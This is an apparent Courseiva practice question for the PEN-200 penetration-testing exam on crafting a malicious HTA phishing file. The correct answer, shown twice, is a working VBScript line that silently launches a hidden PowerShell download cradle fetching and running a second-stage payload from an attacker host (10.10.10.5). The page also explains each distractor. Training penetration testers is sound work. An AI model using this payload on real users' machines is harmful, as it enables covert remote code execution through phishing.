PEN-200 Client-Side Attacks Practice Question
You are crafting a malicious HTML Application (.hta) to deliver to a Windows user during a phishing engagement. When the file is opened, you want it to execute a PowerShell download cradle that fetches a second-stage payload. Which VBScript construct inside the HTA most directly spawns the hidden PowerShell process?
⚠ Common exam trap
The trap here is assuming that merely creating a COM object such as XMLHTTP or FileSystemObject performs the network fetch and execution, when in fact an explicit process-launch call is required.
Answer choices
Why each option matters
Answer the question above first, then reveal the full breakdown to understand why each option is right or wrong.
Correct answer & explanation
✓
CreateObject("WScript.Shell").Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/a.ps1')", 0, False
An HTA executes VBScript or JScript in the mshta.exe host, which exposes the WScript object model. Using WScript.Shell.Run with the hidden window flag executes the PowerShell download cradle without displaying a console, letting the HTA silently retrieve and run the next-stage payload from the attacker's HTTP server.
Answer analysis
Option-by-option breakdown
For each option: why learners choose it and why it is or isn't the right answer here.
- ✗
CreateObject("WScript.Network").MapNetworkDrive "Z:", "\\10.10.10.5\share"
Why it's wrong here
WScript.Network.MapNetworkDrive connects an SMB share to a drive letter. It does not download an HTTP payload and does not launch PowerShell, so it neither fetches the second stage over HTTP nor executes it. Mapping a drive could even trigger authentication to an attacker SMB listener, but that is a different technique than the one requested here.
- ✗
CreateObject("MSXML2.XMLHTTP").Open "GET", "http://10.10.10.5/a.ps1", False
Why it's wrong here
XMLHTTP.Open merely initializes an HTTP request object; it does not send the request or execute the response. Without a subsequent Send and an execution primitive such as WScript.Shell.Run, no PowerShell process is created. This option retrieves nothing and executes nothing, so it cannot satisfy the objective.
- ✗
CreateObject("Scripting.FileSystemObject").OpenTextFile "http://10.10.10.5/a.ps1"
Why it's wrong here
FileSystemObject.OpenTextFile reads local files from disk and does not perform HTTP requests, so pointing it at a URL fails outright. Even if it returned content, it would only give you a text stream, not process execution. It therefore cannot spawn PowerShell or fetch the remote second stage as required.
- ✓
CreateObject("WScript.Shell").Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.5/a.ps1')", 0, False
Why this is correct
WScript.Shell.Run launches the specified command line, and the window-style argument 0 hides the console while False returns immediately without waiting. Embedding a PowerShell download cradle this way makes the HTA fetch and execute the second stage transparently to the user. This is the canonical construct used when an HTA must silently invoke PowerShell on open.
About these practice questions
One of 285 original PEN-200 practice questions on Courseiva, each with a full explanation and wrong-answer analysis — not exam dumps or protected exam content. Learn why practice questions differ from exam dumps →
JA
Written and reviewed by Johnson Ajibi, MSc IT Security
Senior Network & Security Engineer · founder of Courseiva
Last reviewed September 2026 · checked against the official OffSec exam blueprint
This PEN-200 practice question is part of Courseiva's free OffSec certification practice question bank. Courseiva provides original exam-style practice questions with explanations, topic-based practice, mock exams, readiness tracking, and study analytics to help learners prepare for the PEN-200 exam.